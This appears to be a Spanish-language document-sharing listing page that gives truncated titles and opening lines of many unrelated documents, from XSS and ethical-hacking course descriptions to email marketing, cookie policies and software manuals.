Ataques XSS en Aplicaciones Web Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted

Más detalles

Servicio de Email Marketing

Servicio de Email Marketing Servicio de Email Marketing Cuando hablamos de Email marketing, es un envío Masivo de correos con permisos realizado por herramientas tecnológicas de correo electrónico, mediante el cual su anuncio estará

Más detalles

Herramientas útiles para gestionar tu negocio

Herramientas útiles para gestionar tu negocio Herramientas útiles para gestionar tu negocio GESTIONA TUS RESERVAS: GOOGLE CALENDAR MARKETING PARA DISPOSITIVOS MÓVILES: MENSATEK Y MASSYPHONE MARKETING PARA CORREO PUBLICITARIO Y PROMOCIONAL: MAILCHIMP

Más detalles

ACCIONES FORMATIVAS. oct/nov 2013. coordinación docente

ACCIONES FORMATIVAS. oct/nov 2013. coordinación docente oct/nov coordinación docente calendario octubre/noviembre L M X J V S D 1 2 3 4 5 6 WORDPRESS INTEGRAL WORDPRESS INTEGRAL GOOGLE ANALYTICS Y HERRAMIENTAS GOOGLE 7 8 GOOGLE ANALYTICS Y HERRAMIENTAS GOOGLE

Más detalles

Security Health Check

Security Health Check www.pwc.es Security Health Check Aportamos el valor que necesitas Un problema no tan lejano... Durante los últimos años, las empresas han abordado procesos de transformación tecnológica sin precedentes

Más detalles

Health Republic Insurance Política de privacidad del sitio web

Health Republic Insurance Política de privacidad del sitio web Health Republic Insurance Política de privacidad del sitio web Introducción Nos encargamos seriamente de salvaguardar su privacidad. Hemos creado esta Política de privacidad del sitio web para familiarizarnos

Más detalles

Universidad Técnica Federico Santa María Departamento de Electrónica. Proyecto Redes de Computadores Elo322 Routers, Servidor Virtual y Seguridad

Universidad Técnica Federico Santa María Departamento de Electrónica. Proyecto Redes de Computadores Elo322 Routers, Servidor Virtual y Seguridad Universidad Técnica Federico Santa María Departamento de Electrónica Proyecto Redes de Computadores Elo322 Routers, Servidor Virtual y Seguridad Integrantes: Edson Contreras C. Luis Marcel Barraza M. Fecha:

Más detalles

ENVÍO DE E-MAIL POR MEDIO DE SMTP

ENVÍO DE E-MAIL POR MEDIO DE SMTP UNIVERSIDAD TÉCNICA FEDERICO SANTA MARÍA DEPARTAMENTO DE ELECTRÓNICA ELO 322: REDES DE COMPUTADORES I ENVÍO DE E-MAIL POR MEDIO DE SMTP Alumnos Ariel Mancilla G. 2521040-9 Daniel Spataris J. 2521029-8

Más detalles

Manual de Usuario e Instalación McAfee Multi Access

Manual de Usuario e Instalación McAfee Multi Access Manual de Usuario e Instalación McAfee Multi Access Bienvenido a McAfee Multi Access! McAfee Multi Access es un servicio de seguridad que proporciona una protección completa hasta en cinco dispositivos

Más detalles

Seguridad en Internet: la visión de los usuarios.

Seguridad en Internet: la visión de los usuarios. Marzo 2009 Seguridad en Internet: la visión de los usuarios. Investigación de mercado especialmente realizada por D Alessio IROL para CertiSur S.A. Se autoriza la utilización total o parcial de este material

Más detalles

Solución al Primer Reto

Solución al Primer Reto En el reto que se planteaba en el primer articulo se pedía conseguir toda la información posible sobre la maquina virtual que se suministra y a través de dicha información descubrir vulnerabilidades e

Más detalles

Por: Lic. Luis Coreas Gerente General & Social Media Cmarketing. 1 http://es.wikipedia.org/wiki/c%c3%b3digo_qr

Por: Lic. Luis Coreas Gerente General & Social Media Cmarketing. 1 http://es.wikipedia.org/wiki/c%c3%b3digo_qr Herramientas tecnológicas para el Posicionamiento de una marca. Por: Lic. Luis Coreas Gerente General & Social Media Cmarketing Existen diferentes herramientas tecnológicas que no se les están dando la

Más detalles

Ethical Hacking and Countermeasures

Ethical Hacking and Countermeasures Page 1 Ethical Hacking and Countermeasures http://www.eccouncil.org Página 2 EHTM CCertified Ethical Hacker Contenido Qué hay de nuevo en CEHv6?... Pág. 4 Certified Ethical Hacker v6...... Pág. 5 Programa

Más detalles

Empieza a utilizar LiveBox

Empieza a utilizar LiveBox 2014 Empieza a utilizar LiveBox http://www.liveboxcloud.com Empieza a utilizar Livebox Livebox es un software de cloud privado que te permite almacenar, compartir y editar documentos ubicados dentro del

Más detalles

MDM Cloud. Conociendo el servicio. Alestra Información Restringida.

MDM Cloud. Conociendo el servicio. Alestra Información Restringida. MDM Cloud Conociendo el servicio Alestra Información Restringida. MDM Cloud es un servicio desarrollado en conjunto con SAP y su producto Afaria, que ofrece una herramienta para gestión dispositivos móviles

Más detalles

Cómo sabes si tus esfuerzos en Social Media te están dando resultados? Para eso hay que medir, y Google Analytics ha venido a ayudarnos.

Cómo sabes si tus esfuerzos en Social Media te están dando resultados? Para eso hay que medir, y Google Analytics ha venido a ayudarnos. Cómo sabes si tus esfuerzos en Social Media te están dando resultados? Para eso hay que medir, y Google Analytics ha venido a ayudarnos. Hoy en día, las piedras angulares de los negocios son las páginas

Más detalles

correo electrónico con hotmail

correo electrónico con hotmail correo electrónico con hotmail Aunque parezca mentira, a pesar de ser la utilidad más antigua, extendida y útil de la Internet, no todo el mundo sabe como enviar un correo electrónico. En muchos casos,

Más detalles

FAQ Santander Twist JUNIO 2014

FAQ Santander Twist JUNIO 2014 FAQ Santander Twist JUNIO 2014 FAQ General Registro Menú Barra de Filtro Promoción App 2 FAQ General Cuál es la dirección de Santander Twist? La dirección es www.santandertwist.com.mx Qué se necesita para

Más detalles

Qué son y cómo combatirlas

Qué son y cómo combatirlas Redes zombies Qué son y cómo combatirlas Calle San Rafael, 14 28108 Alcobendas (Madrid) 902 90 10 20 www..com Introducción Hoy en día podemos encontrar un elevado número de amenazas en la red, pero unas

Más detalles

La elección de Blogger como la plataforma o lugar donde

La elección de Blogger como la plataforma o lugar donde 1. INTRODUCCIÓN La elección de Blogger como la plataforma o lugar donde alojar nuestro blog es adecuada si no deseamos complicarnos con la instalación de un servidor propio, con todo lo que ello conlleva:

Más detalles

Hacking Ético & Seguridad Ofensiva

Hacking Ético & Seguridad Ofensiva Hacking Ético & Seguridad Ofensiva INDICE DATOS DEL CURSO OBJETIVOS DEL CURSO CONTENIDO MATERIALES Y RECURSOS DEL CURSO EVALUACION DATOS DEL CURSO Duración: 6 Jornadas (30horas), (08:00 am a 13:00 pm)

Más detalles

Fácil manipulación ya que no la recibirás físicamente evitando que se extravíe o deteriore.

Fácil manipulación ya que no la recibirás físicamente evitando que se extravíe o deteriore. FACTURA Electrónica ASPECTOS GENERALES La validez de una factura electrónica es exactamente la misma que una factura en papel y gracias a la certificación efectuada por el SRI se garantiza su integridad

Más detalles

COMO MEDIR LA EFECTIVIDAD DE LA CONCIENTIZACIÓN

COMO MEDIR LA EFECTIVIDAD DE LA CONCIENTIZACIÓN COMO MEDIR LA EFECTIVIDAD DE LA CONCIENTIZACIÓN Ing. Carlos Ormella Meyer Los planes de concientización especialmente en seguridad de la información han sido muchas veces terreno fértil de opiniones discordantes,

Más detalles

Windows Server 2012: Infraestructura de Escritorio Virtual

Windows Server 2012: Infraestructura de Escritorio Virtual Windows Server 2012: Infraestructura de Escritorio Virtual Módulo 1: Application Virtualization Módulo del Manual Autores: James Hamilton-Adams, Content Master Publicado: 5 de Octubre 2012 La información

Más detalles

Redes Sociales. Tema 2a

Redes Sociales. Tema 2a Redes Sociales Tema 2a Las redes sociales en Internet son comunidades virtuales donde sus usuarios interactúan con personas de todo el mundo con quienes encuentran gustos o intereses en común. Las redes

Más detalles

Teléfono: +34-96-398-5300 Telefax: +34-96-196-1781 Email: csirtcv@gva.es https://www.facebook.com/csirtcv https://twitter.

Teléfono: +34-96-398-5300 Telefax: +34-96-196-1781 Email: csirtcv@gva.es https://www.facebook.com/csirtcv https://twitter. Como identificar phishing Sobre CSIRT-cv CSIRT-cv es el Centro de Seguridad TIC de la Comunitat Valenciana. Nace en junio del año 2007, como una apuesta de la Generalitat Valenciana por la seguridad en

Más detalles

Política de comunicación corporativa

Política de comunicación corporativa Política de comunicación corporativa 1. Introducción Debemos tener presente que Todo comunica : Desde los e-mails que mandamos a nuestros clientes, proveedores, compañeros y demás colaboradores, hasta

Más detalles

Almacenar tus preferencias, como el idioma que has seleccionado o el tamaño de letra.

Almacenar tus preferencias, como el idioma que has seleccionado o el tamaño de letra. Política de Cookies Este sitio web, al igual que la mayoría de los sitios en Internet, usa Cookies para mejorar y optimizar la experiencia del usuario. A continuación encontrarás información detallada

Más detalles

LISTA DE CONTROL DEL SERVICIO MÓVIL DE UNIVISION MOBILE

LISTA DE CONTROL DEL SERVICIO MÓVIL DE UNIVISION MOBILE LISTA DE CONTROL DEL SERVICIO MÓVIL DE UNIVISION MOBILE Univision Mobile conecta a sus fieles seguidores con las personas, lugares y cosas que les encantan a diario. Para obtener más información, visita

Más detalles

Internet, conceptos básicos

Internet, conceptos básicos Internet, conceptos básicos IP (INTERNET PROTOCOL) Toda computadora tiene un número que la identifica en una red, este número es lo que llamamos IP, una dirección de IP típica se ve de esta manera Direcciones

Más detalles

1 ÍNDICE... 3 Instalación... 4 Proceso de instalación en red... 6 Solicitud de Código de Activación... 11 Activación de Licencia... 14 2 3 REQUERIMIENTOS TÉCNICOS E INSTALACIÓN Requerimientos Técnicos

Más detalles

Universidad Galileo Fisicc-Idea Administración de Negocios Comercio Electrónico Sábados 11:00 a.m. Lic. Willy Alvarez

Universidad Galileo Fisicc-Idea Administración de Negocios Comercio Electrónico Sábados 11:00 a.m. Lic. Willy Alvarez Universidad Galileo Fisicc-Idea Administración de Negocios Comercio Electrónico Sábados 11:00 a.m. Lic. Willy Alvarez Luis Miguel Quiñonez García 08282008 Franz Mark Ortiz Mérida 09182089 Mynor Rolando

Más detalles